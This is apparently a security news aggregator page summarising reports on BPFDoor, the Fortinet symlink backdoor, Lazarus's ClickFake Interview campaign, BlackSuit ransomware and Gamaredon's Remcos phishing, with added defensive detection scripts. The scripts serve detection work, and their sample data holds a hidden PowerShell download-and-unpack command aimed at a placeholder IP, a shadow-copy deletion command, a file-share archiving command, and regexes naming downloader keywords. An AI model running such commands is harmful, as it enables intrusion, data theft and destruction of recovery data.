CyberSecurity news

FlagThis - #backdoor

Anna Ribeiro@Industrial Cyber //
Trend Micro researchers have uncovered a novel controller linked to the BPFDoor backdoor, enabling stealthy reverse shell attacks on Linux servers across Asia and the Middle East. This previously unseen controller is attributed to the Red Menshen advanced persistent threat (APT) group, tracked by Trend Micro as Earth Bluecrow. The attacks, observed in the telecommunications, finance, and retail sectors, have been documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. This discovery highlights the ongoing cyberespionage activities leveraging sophisticated and evasive techniques to compromise Linux systems.

The controller's primary function is to open a reverse shell on compromised systems, which lets attackers move laterally within the network, take control of additional systems, and access sensitive data. BPFDoor uses the packet filtering features of the Berkeley Packet Filter (BPF) to inspect incoming network packets in the kernel, waiting for a "magic sequence" that activates the backdoor. Because the implant never opens a listening port, casual security sweeps such as port scans and listening-socket checks show nothing unusual, which makes it well suited to long-term espionage. The malware can also change its process name to further mask its presence.

Trend Micro's investigation indicates that BPFDoor has been active since at least 2021, with consistent campaigns targeting Linux servers across multiple industries. The attackers are known to hide the malware under non-standard paths, such as /tmp/zabbix_agent.log or /bin/vmtoolsdsrv. Defenders are advised to monitor for TCP packets whose payload starts with 0x5293, followed by an IP:port pair and a password, and for the corresponding UDP and ICMP magic packets. Because the magic bytes and passwords are customizable per sample, static indicators are unreliable; proactive network monitoring and inspection of the BPF programs attached to sockets on the host are crucial for protecting organizations against BPF-powered threats.
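
As an added example that is not part of the Trend Micro report or of this page, the following Python script shows the network side of that monitoring advice: it parses raw IPv4 packets, locates the start of the TCP payload and flags segments whose first two bytes are the 0x5293 magic. The byte layout assumed after the magic (4-byte IPv4 address, 2-byte port, NUL-terminated password) and the sample packets are constructed for illustration; real samples may use a different layout and different magic values, which is why the magic is a parameter.

```python
"""Flag BPFDoor-style TCP magic packets in raw IPv4 traffic (added example, not from the report).

Assumptions: the layout after the 2-byte magic (IPv4 address, big-endian port, NUL-terminated
password) and the sample packets are constructed here for illustration.
"""
import ipaddress
import struct

TCP_MAGIC = 0x5293   # magic reported for BPFDoor's TCP activation packets; customizable per sample
IPPROTO_TCP = 6


def parse_ipv4(pkt: bytes):
    """Return (proto, src, dst, l4_bytes) for an IPv4 packet, or None if it is malformed."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl:
        return None
    src = str(ipaddress.IPv4Address(pkt[12:16]))
    dst = str(ipaddress.IPv4Address(pkt[16:20]))
    return pkt[9], src, dst, pkt[ihl:]


def tcp_payload(seg: bytes):
    """Skip the TCP header; the data offset (in 32-bit words) is the high nibble of byte 12."""
    if len(seg) < 20:
        return None
    off = (seg[12] >> 4) * 4
    return seg[off:] if 20 <= off <= len(seg) else None


def parse_magic_trailer(data: bytes):
    """Assumed layout after the magic: IPv4 (4 bytes) + port (2 bytes, BE) + NUL-terminated password."""
    if len(data) < 6:
        return None
    ip = str(ipaddress.IPv4Address(data[:4]))
    port = struct.unpack("!H", data[4:6])[0]
    password = data[6:].split(b"\x00", 1)[0].decode("ascii", "replace")
    return {"callback_ip": ip, "callback_port": port, "password": password}


def inspect_packet(pkt: bytes, magic: int = TCP_MAGIC):
    """Return a finding dict for a TCP segment whose payload starts with the magic, else None."""
    parsed = parse_ipv4(pkt)
    if parsed is None:
        return None
    proto, src, dst, l4 = parsed
    if proto != IPPROTO_TCP:
        return None   # UDP/ICMP magic values vary per sample; add them here from your own intel
    payload = tcp_payload(l4)
    if not payload or len(payload) < 2 or struct.unpack("!H", payload[:2])[0] != magic:
        return None
    finding = {"src": src, "dst": dst}
    trailer = parse_magic_trailer(payload[2:])
    if trailer:
        finding.update(trailer)
    return finding


def build_tcp_packet(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Build a minimal IPv4+TCP packet (checksums left zero; enough for offline parsing)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, IPPROTO_TCP, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return ip_hdr + tcp_hdr + payload


def scan(packets):
    """Run the check over an iterable of raw IPv4 packets and return all findings."""
    return [f for f in (inspect_packet(p) for p in packets) if f]


# Constructed samples: an ordinary HTTP request and a magic packet naming a callback of 203.0.113.10:4444.
BENIGN = build_tcp_packet("192.0.2.1", "192.0.2.2", 40000, 80, b"GET / HTTP/1.1\r\n\r\n")
MAGIC = build_tcp_packet("192.0.2.1", "192.0.2.2", 40000, 443,
                         struct.pack("!H", TCP_MAGIC)
                         + ipaddress.IPv4Address("203.0.113.10").packed
                         + struct.pack("!H", 4444) + b"s3cret\x00")

if __name__ == "__main__":
    for finding in scan([BENIGN, MAGIC]):
        print(finding)
```

The same check as a capture filter, for pulling candidate packets off the wire: `tcpdump -nn 'tcp[((tcp[12:1] & 0xf0) >> 2):2] = 0x5293'`. On the host, the complementary check is `ss -0pb`, which lists packet sockets together with the BPF program attached to them and the owning process; a process that holds such a socket while owning no listening socket is exactly the profile described above, and its reverse shell then shows up as an outbound connection from that process.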

Recommended read:
References :
  • securityonline.info: BPFDoor Backdoor Used in Asia, Middle East Cyberespionage
  • Virus Bulletin: Trend Micro's Fernando Mercês writes about BPFDoor, a state-sponsored backdoor designed for cyberespionage activities targeting the telecommunications, finance and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia and Egypt.
  • www.trendmicro.com: BPFDoor’s new hidden controller emerges! Attackers can open reverse shells or direct port for stealth access on Linux servers.
  • gbhackers.com: A new wave of cyber espionage attacks has brought BPFDoor malware into the spotlight as a stealthy and dangerous tool for compromising networks.
  • Cyber Security News: CybersecurityNews: Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks
  • gbhackers.com: GBHackers: BPFDoor Malware Uses Reverse Shell to Expand Control Over Compromised Networks
  • Industrial Cyber: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • www.scworld.com: Novel BPFDoor backdoor component facilitates covert attacks
  • Security Risk Advisors: 🚩 BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks

@www.bleepingcomputer.com //
Over 16,000 internet-exposed Fortinet devices have been found compromised with a novel symlink backdoor that gives attackers persistent read-only access to sensitive files, according to The Shadowserver Foundation. The attackers originally broke in through known FortiOS vulnerabilities, then planted a symbolic link in the directory that serves SSL-VPN language files, linking the user filesystem to the root filesystem. Because that directory is served by the SSL-VPN web interface, the link let them read configuration and other critical files, and it survived the patches that closed the original entry point.

Researchers observed threat actors using a new post-exploitation technique against FortiGate VPN appliances that had already been patched for previously exploited FortiOS vulnerabilities. The original flaws, CVE-2023-27997 among them, were fixed, but attackers who had exploited them earlier left behind symbolic links that the firmware updates did not remove, which gave them continued read-only access to the device's files after patching. The issue stems from how FortiOS handled files and symlinks in the SSL-VPN language directory: a malicious link planted there persisted even though the vulnerability used to plant it was closed.

Fortinet has responded with several updates and new safeguards to block further abuse: an internal investigation, coordination with third-party experts, and an AV/IPS signature that detects and removes the symbolic link automatically. Fixes have been issued across the supported FortiOS branches, in versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates remove the malicious link and also modify the SSL-VPN interface so that such links are no longer served. Organizations are urged to upgrade to these versions and, since a read-only view of the device included its configuration, to review that configuration and follow Fortinet's compromise-recovery guidance for any device found to carry the link.
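
The generic shape of that bug, as an added example not taken from this page or from FortiOS: a web handler that serves files from a directory, a symlink planted in that directory that points into the root filesystem, and the containment check that refuses to follow it. Everything runs inside a temporary directory; the file names and the "lang" folder are stand-ins, not FortiOS paths.

```python
"""Symlink-escape check for a web-served directory (added example, not FortiOS code).

Generic illustration of the issue class described above: a symlink planted inside a served
directory (a stand-in 'lang' folder) that resolves into the root filesystem, the naive handler
that follows it, the hardened handler that refuses, and an audit that lists such links. All
files and paths are constructed in a temporary directory.
"""
import os
import tempfile
from pathlib import Path


def serve_naive(webroot: Path, name: str) -> bytes:
    """Vulnerable pattern: joins the name onto the root and reads whatever it resolves to."""
    return (webroot / name).read_bytes()


def serve_contained(webroot: Path, name: str) -> bytes:
    """Hardened: resolve symlinks first, then require the real path to stay under the real root."""
    root = webroot.resolve()
    target = (webroot / name).resolve()
    if root != target and root not in target.parents:
        raise PermissionError(f"refusing to serve {name}: resolves outside {root}")
    return target.read_bytes()


def find_escaping_symlinks(webroot: Path):
    """Audit helper: every symlink under webroot whose target resolves outside it."""
    root = webroot.resolve()
    hits = []
    for p in webroot.rglob("*"):
        if p.is_symlink():
            real = p.resolve()
            if root != real and root not in real.parents:
                hits.append((str(p.relative_to(webroot)), str(real)))
    return hits


def demo():
    """Build the scenario and return (naive_read, hardened_refused, hardened_ok_read, audit_hits)."""
    with tempfile.TemporaryDirectory() as tmpdir:
        base = Path(tmpdir)
        secret = base / "etc" / "config.conf"            # stands in for a sensitive file on the root fs
        secret.parent.mkdir()
        secret.write_bytes(b"admin-password=hunter2\n")
        webroot = base / "webroot"
        lang = webroot / "lang"                           # stands in for the served language-file folder
        lang.mkdir(parents=True)
        (lang / "en.json").write_bytes(b"{}")
        os.symlink(secret, lang / "en_US.json")           # the planted link into the root filesystem

        naive = serve_naive(webroot, "lang/en_US.json")   # follows the link and leaks the file
        try:
            serve_contained(webroot, "lang/en_US.json")
            refused = False
        except PermissionError:
            refused = True
        ok = serve_contained(webroot, "lang/en.json")     # a legitimate file is still served
        return naive, refused, ok, find_escaping_symlinks(webroot)


if __name__ == "__main__":
    leaked, refused, ok, hits = demo()
    print("naive handler leaked:", leaked)
    print("hardened handler refused:", refused, "| legitimate file:", ok)
    print("escaping symlinks:", hits)
```

`find_escaping_symlinks` is the check to run on any directory a web server exposes after an incident; the point of the Fortinet case is that the link outlived the patch, so the audit has to be repeated after upgrading, not only before.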

Recommended read:
References :
  • www.cybersecuritydive.com: Fortinet warns of threat activity against older vulnerabilities
  • thehackernews.com: The Hacker News article on Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit
  • community.fortinet.com: Technical Tip : Recommended steps to execute in case of a compromise
  • BleepingComputer: Fortinet warns that threat actors use a post-exploitation technique
  • BleepingComputer: Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks
  • Help Net Security: HelpNetSecurity: FortiOS, FortiGate vulnerabilities
  • bsky.app: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • www.helpnetsecurity.com: Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices
  • securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
  • bsky.app: Fortinet has urged customers to install a recent FortiGate firmware update that mitigates a new technique abused in the wild. The technique allows attackers to maintain read-only access to FortiGate devices they previously infected.
  • hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • www.scworld.com: SCWorld brief on Fortinet FortiGate fixes circumvented by symlink exploit
  • The Register - Security: Old Fortinet flaws under attack with new method its patch didn't prevent
  • MSSP feed for Latest: Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit
  • securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • Blog: Threat actors have been observed leveraging a new method to exploit a previously patched vulnerability in Fortinet’s FortiOS operating system—specifically targeting FortiGate VPN appliances. Although Fortinet issued a fix for the original flaw (CVE-2023-27997), researchers found that threat actors can still gain access by manipulating symbolic links (symlinks) during the device’s boot process.
  • BleepingComputer: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
  • www.bleepingcomputer.com: Over 16,000 Fortinet devices compromised with symlink backdoor
  • The DefendOps Diaries: Fortinet Devices Under Siege: Understanding the Symlink Backdoor Threat
  • www.cybersecuritydive.com: Over 14K Fortinet devices compromised via new attack method

do son@securityonline.info //
A new "ClickFake Interview" campaign, attributed to the Lazarus Group, is targeting professionals in the cryptocurrency sector with fraudulent job offers. Security researchers at Sekoia discovered the operation, revealing that threat actors impersonate recruiters on platforms like LinkedIn and X (formerly Twitter) to lure victims to fake job-interview websites. Those sites use the ClickFix technique: rather than asking the candidate to open an attachment, they talk the candidate into copying and running a command themselves, which installs the malware and opens the way to data theft.

The payload is the GolangGhost backdoor, delivered in Windows and macOS builds, which grants attackers remote access to compromised systems. This allows the Lazarus Group to steal sensitive information, including cryptocurrency wallet credentials, execute arbitrary commands, and maintain persistent access. Sekoia notes that the infrastructure overlaps with the earlier Contagious Interview campaign and that the new operation also targets cryptocurrency industry employees in non-technical roles, who are less likely to recognize the command they are asked to run as malicious. Professionals are advised to verify recruiter identities, never run commands supplied during an interview, avoid downloading files from unknown sources, and use endpoint protection to mitigate the risk.

Recommended read:
References :
  • : New “ClickFake Interview” campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
  • www.scworld.com: ClickFix technique leveraged in new crypto-targeted Lazarus attacks
  • Virus Bulletin: Sekoya researchers discovered a ClickFake Interview campaign targeting job seekers with fake job interview websites. The infrastructure aligns with technical indicators linked to the Contagious Interview campaign and delivers GolangGhost backdoor for Windows & macOS
  • Security Risk Advisors: Lazarus Uses “ClickFake Interview” to Distribute Backdoors via Fake Crypto Job Websites
  • The Hacker News: Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware

do son@securityonline.info //
Cybersecurity analysts have uncovered a sophisticated intrusion that used a fake Zoom installer to deliver BlackSuit ransomware across a Windows network. The attack began with a malicious download from a website mimicking the Zoom teleconferencing application; when the victim clicked the “Download” button, they unknowingly started a chain of events that ended with the whole network encrypted.

The fake installer, built with Inno Setup, carried d3f@ckloader, a Pascal-based loader, which together with the IDAT loader dropped SectopRAT for initial access. After nine days the attackers deployed Brute Ratel and Cobalt Strike for lateral movement and used QDoor to proxy RDP connections, then pushed BlackSuit ransomware across the network, deleting Volume Shadow Copies to hinder recovery before encrypting files and dropping ransom notes. For exfiltration, they compressed file-share data with WinRAR and uploaded the archives to Bublup, a cloud storage service.
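
The two staging steps in that chain that show up most clearly in process-creation telemetry are the shadow-copy deletion and the archiving of file-share data before upload. The following is an added example, not code from The DFIR Report: a small triage pass over constructed Sysmon-style events whose field names, hosts and command lines are assumptions chosen to resemble the narrative.

```python
"""Process-creation triage for the ransomware precursor steps described above (added example).

Flags Volume Shadow Copy deletion and archiver runs against file-share paths. The events are
constructed here in a Sysmon-like JSON shape; field names, hosts and command lines are
assumptions, not telemetry from the incident.
"""
import json
import re

SHADOW_DELETE = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"win32_shadowcopy.*\.delete\(\)", re.I),
]
ARCHIVER_IMAGE = re.compile(r"(^|\\)(rar|winrar|7z|7za)\.exe$", re.I)
ARCHIVE_ADD = re.compile(r"(^|\s)a\s", re.I)           # 'a' = add-to-archive for rar/7z
UNC_PATH = re.compile(r"\\\\[\w.-]+\\[\w$.-]+", re.I)   # \\server\share

SAMPLE_EVENTS = [  # constructed
    {"host": "FS01", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "WS12", "user": "CORP\\jdoe", "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "cmdline": "Rar.exe a -r -hpS3cret C:\\Users\\Public\\fin.rar \\\\FS01\\Finance\\"},
    {"host": "WS12", "user": "CORP\\jdoe", "image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "cmdline": "WinRAR.exe x C:\\Users\\jdoe\\Downloads\\photos.rar"},
    {"host": "WS12", "user": "CORP\\jdoe", "image": "C:\\Program Files\\Zoom\\bin\\Zoom.exe",
     "cmdline": "Zoom.exe --url=zoommtg://zoom.us/join"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]


def classify(event: dict):
    """Return a label for one process-creation event, or None if it looks ordinary."""
    cmd = event.get("cmdline", "")
    image = event.get("image", "")
    if any(p.search(cmd) for p in SHADOW_DELETE):
        return "shadow_copy_deletion"
    if ARCHIVER_IMAGE.search(image) and ARCHIVE_ADD.search(cmd) and UNC_PATH.search(cmd):
        return "share_archiving"
    return None


def triage(lines):
    """Parse JSON lines and return (host, user, label) for every event that matches a rule."""
    hits = []
    for line in lines:
        event = json.loads(line)
        label = classify(event)
        if label:
            hits.append((event["host"], event["user"], label))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit)
```

In a SIEM the same logic becomes two rules. The archiver rule is deliberately narrow (add-to-archive of a UNC path) because archivers are common on workstations, while shadow-copy deletion by anything other than backup tooling is worth an alert on its own.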

Recommended read:
References :
  • bsky.app: The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).
  • BleepingComputer: North Korean hackers adopt ClickFix attacks to target crypto firms
  • Cyber Security News: Hackers Exploit Zoom Installer to Gain RDP Access and Launch BlackSuit Ransomware Attack
  • gbhackers.com: Beware! A Fake Zoom Installer Drops BlackSuit Ransomware on Your Windows Systems
  • Virus Bulletin: The DFIR Report researchers look into a fake Zoom installer that used d3f@ckloader & IDAT loader to drop SectopRAT, which dropped Cobalt Strike & Brute Ratel after 9 days. For later movement the threat actor used QDoor & finally deployed BlackSuit ransomware.
  • Osint10x: Fake Zoom Ends in BlackSuit Ransomware
  • securityonline.info: Fake Zoom, Real Ransom: Nine-Day Malware Intrusion Ends with BlackSuit Ransomware Blast
  • bsky.app: Lazarus adopts ClickFix technique.
  • : New “ClickFake Interview” campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
  • BleepingComputer: Report of the Lazarus Group adopting the ClickFix technique for malware deployment.

Pierluigi Paganini@Security Affairs //
Russia-linked Gamaredon is actively targeting Ukrainian users with a phishing campaign that deploys the Remcos remote access trojan (RAT). The ongoing campaign, uncovered by Cisco Talos and active since at least November 2024, delivers malicious LNK files disguised as Microsoft Office documents inside ZIP archives. The file names, written in Russian, reference troop movements and other sensitive themes related to the conflict in Ukraine, a deliberate attempt to exploit the current situation to lure victims.

The attack chain begins when the LNK file runs a PowerShell downloader embedded in it. The downloader contacts geo-fenced servers located in Russia and Germany to retrieve a second-stage ZIP archive containing the Remcos backdoor, which is then executed through DLL sideloading. Cisco Talos attributes the activity to Gamaredon with medium confidence; the group, which Talos and others link to Russia's Federal Security Service (FSB), has targeted Ukrainian organizations for espionage and data theft since at least 2013.
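
To show what a responder looks for in such a shortcut, here is an added example (not Talos's code) of a minimal Shell Link (.lnk) parser: it reads the header, skips the optional LinkTargetIDList and LinkInfo blocks, extracts the StringData fields, and scores the command line for downloader behaviour. The sample .lnk is built in memory by build_lnk(); its file name, URL and arguments are placeholders, not indicators from the report.

```python
"""Minimal Shell Link (.lnk) triage for the LNK-to-PowerShell chain described above (added example).

The sample shortcut is constructed in memory by build_lnk(); the relative path, arguments,
URL and file name are placeholders, not indicators from the Talos report.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon")]

DOWNLOADER_PATTERNS = [
    (r"powershell|pwsh", "powershell host"),
    (r"-(w|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin", "network download"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"expand-archive|\.zip\b", "zip staging"),
]


def _string(s: str) -> bytes:
    """StringData field: CountCharacters (u16) followed by UTF-16LE characters (IsUnicode set)."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str, icon: str = "") -> bytes:
    """Build a minimal .lnk carrying only StringData fields (no IDList, no LinkInfo)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE | (HAS_ICON if icon else 0)
    header = struct.pack("<I16sII8s8s8sIIIHHII",
                         0x4C, LNK_CLSID, flags, 0x20,        # HeaderSize, CLSID, LinkFlags, FILE_ATTRIBUTE_ARCHIVE
                         b"\0" * 8, b"\0" * 8, b"\0" * 8,     # creation / access / write times
                         0, 0, 1, 0, 0, 0, 0)                 # FileSize, IconIndex, SW_SHOWNORMAL, HotKey, reserved
    return header + _string(relative_path) + _string(arguments) + (_string(icon) if icon else b"")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData; raises ValueError if the bytes are not a Shell Link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_IDLIST:                        # IDListSize (u16) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                      # LinkInfoSize (u32) covers the whole block
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + count * 2].decode("utf-16-le")
            off += count * 2
        else:
            fields[name] = data[off:off + count].decode("cp1252")
            off += count
    return fields


def score(fields: dict, filename: str = "") -> list:
    """Reasons a shortcut looks like a downloader lure; an empty list means nothing matched."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    reasons = [label for pat, label in DOWNLOADER_PATTERNS if re.search(pat, text, re.I)]
    if re.search(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", filename, re.I):
        reasons.append("double extension")
    return reasons


# Constructed sample: a shortcut posing as a document that launches a hidden PowerShell downloader.
SAMPLE_NAME = "document.docx.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -c "iwr http://198.51.100.7/stage2.zip -OutFile $env:TEMP\s.zip; '
    r'Expand-Archive $env:TEMP\s.zip $env:TEMP"',
    icon=r"%SystemRoot%\System32\imageres.dll",
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print(fields["relative_path"], fields["arguments"], sep="\n")
    print("verdict:", score(fields, SAMPLE_NAME))
```

On real shortcuts the IDList carries the absolute target and LinkInfo the volume and local path; this parser skips both and relies on the relative path and arguments, which is where the PowerShell stage lives in this campaign. A ZIP whose only member is a .lnk with a double extension is itself worth blocking at the mail gateway.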

Recommended read:
References :
  • Cisco Talos Blog: Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.
  • Cyber Security News: A sophisticated cyber espionage campaign targeting Ukrainian entities has been uncovered, revealing the latest tactics of the Russia-linked Gamaredon threat actor group.
  • Christoffer S.: Gamaredon APT Targets Ukraine with Remcos Backdoor Using War-Themed Lures Cisco Talos is tracking a campaign targeting Ukrainian users with malicious LNK files that deliver the Remcos backdoor.
  • gbhackers.com: Cisco Talos has uncovered an ongoing cyber campaign by the Gamaredon threat actor group, targeting Ukrainian users with malicious LNK files to deliver the Remcos backdoor.
  • buherator's timeline: Cisco Talos is tracking a campaign targeting Ukrainian users with malicious LNK files that deliver the Remcos backdoor. The campaign, attributed with medium confidence to the Gamaredon APT group, uses Russian-language lures related to troop movements in Ukraine.
  • securityonline.info: A new targeted malware campaign linked to the Russian state-aligned group Gamaredon is exploiting Windows shortcut (.LNK) files
  • The Hacker News: Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to
  • securityaffairs.com: Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine
  • Virus Bulletin: Cisco Talos researcher Guilherme Venere analyses an ongoing campaign targeting users in Ukraine with malicious LNK files which run a PowerShell downloader. The downloader contacts geo-fenced servers located in Russia & Germany to deploy the second stage Zip file containing the Remcos backdoor.
  • OODAloop: Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. The activity has been attributed with moderate confidence to a Russian hacking group known as Gamaredon.
  • Vulnerable U: Russian Hackers Target Ukraine With Stealthy Malware Attack
  • Cisco Talos Blog: Talos researchers warn that Russia-linked APT group Gamaredon targets Ukraine with a phishing campaign.
  • securityaffairs.com: Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader.
  • www.scworld.com: Ongoing Gamaredon phishing campaign targets Ukraine with Remcos RAT
  • Industrial Cyber: Russian-linked UAC-0219 group escalates attacks on Ukraine government, critical infrastructure
  • The Hacker News: CERT-UA Reports Cyberattacks Targeting Ukrainian State Systems with WRECKSTEEL Malware
  • SOC Prime Blog: UAC-0219 Attack Detection: A New Cyber-Espionage Campaign Using a PowerShell Stealer WRECKSTEEL

Waqas@hackread.com //
Chinese cyber espionage group UNC3886 has been targeting Juniper Networks MX routers running Junos OS that have reached end-of-life and no longer receive security updates. Researchers at Mandiant uncovered the attacks, which began in mid-2024, and found that the group deployed custom backdoors, several of them based on the open-source TINYSHELL, to compromise these outdated systems. The backdoors allowed the attackers to bypass file-integrity protections and maintain persistence, enabling data theft and long-term espionage from edge devices that usually lack security monitoring.

Mandiant's investigation showed that UNC3886 bypassed Veriexec, the Junos OS file-integrity subsystem, by exploiting CVE-2025-21590 to inject malicious code into the memory of a legitimate, already-trusted process rather than writing a new executable to disk. The attackers reached the routers from a terminal server using legitimate credentials, so they already held privileged access when they did this. Juniper Networks and Mandiant recommend that organizations using these routers upgrade immediately, run the Juniper Malware Removal Tool (JMRT) integrity checks to confirm their systems are clean, and protect management of network devices with multi-factor authentication.

Recommended read:
References :
  • hackread.com: Chinese Cyber Espionage Group UNC3886 Backdoored Juniper Routers
  • www.cybersecuritydive.com: Juniper MX routers targeted by China-nexus threat group using custom backdoors
  • : Chinese Hackers Implant Backdoor Malware on Juniper Routers
  • BleepingComputer: Chinese hackers are deploying custom backdoors on Juniper Networks  Junos OS MX routers that have reached end-of-life (EoL) and no longer receive security updates.
  • www.csoonline.com: Chinese cyberespionage group deploys custom backdoors on Juniper routers
  • thehackernews.com: Chinese Hackers Breach Juniper Networks Routers With Custom Backdoors and Rootkits
  • The Register - Security: Expired Juniper routers find new life – as Chinese spy hubs
  • Cybernews: Chinese cyberespionage group is targeting Juniper routers with custom backdoors for outdated hardware.
  • The DefendOps Diaries: Chinese Cyberspies Exploit Juniper Routers: A Deep Dive into Advanced Threats
  • Industrial Cyber: Mandiant uncovers custom backdoors on Juniper Junos OS routers, linked to Chinese espionage group UNC3886
  • The Record: Researchers said the Chinese state-backed group dubbed UNC3886 was behind a campaign to deploy custom backdoors on Juniper's Junos OS routers
  • securityaffairs.com: China-linked APT UNC3886 targets EoL Juniper routers
  • Security Risk Advisors: China-linked UNC3886 deploying custom backdoors on Juniper routers. Upgrade devices, run JMRT scans, implement MFA for network device management.
  • BleepingComputer: ​Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access.
  • securityaffairs.com: Researchers from Mandiant identified that threat actors have been deploying custom backdoors on Juniper Networks’ Junos OS routers. The group known as UNC3886, targeted critical infrastructure sectors.
  • Information Security Buzz: Google Uncovers China-Linked Espionage Campaign Targeting Juniper Routers
  • Virus Bulletin: Mandiant researchers describe UNC3886’s TTPs, and their focus on malware & capabilities that enable them to operate on network & edge devices that usually lack security monitoring & detection solutions. The espionage group targets Juniper routers with TINYSHELL-based backdoors.
  • securityaffairs.com: Mandiant researchers warn that China-linked actors are deploying custom backdoors on Juniper Networks Junos OS MX routers.
  • bsky.app: Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access. [...]
  • Blog: China-linked threat actor deploys backdoors, rootkits on Junos OS routers
  • www.it-daily.net: Chinese espionage on old Juniper routers
  • www.scworld.com: Old Juniper routers targeted by Chinese hackers to deploy various payloads
  • www.techradar.com: Chinese hackers targeting Juniper Networks routers, so patch now
  • Rescana: Rescana Cybersecurity Report: Exploitation in the Wild of CVE-2025-21590
  • bsky.app: Description of Chinese hackers deploying custom backdoors on Juniper routers.
  • www.cysecurity.news: China-linked APT UNC3886 targets EoL Juniper routers
  • securityonline.info: Security Advisory: Juniper Issues Urgent Fix for Actively Exploited Junos OS Flaw – CVE-2025-21590
  • iHLS: Chinese Cyberespionage Group Targets Defense and Technology Organizations’ Routers
  • www.techradar.com: Juniper patches security flaws which could have let hackers take over your router
  • www.scworld.com: Actively exploited Juniper router vulnerability addressed
  • www.scworld.com: The threat actor (UNC3886) was found to be targeting end-of-life Juniper Networks routers.
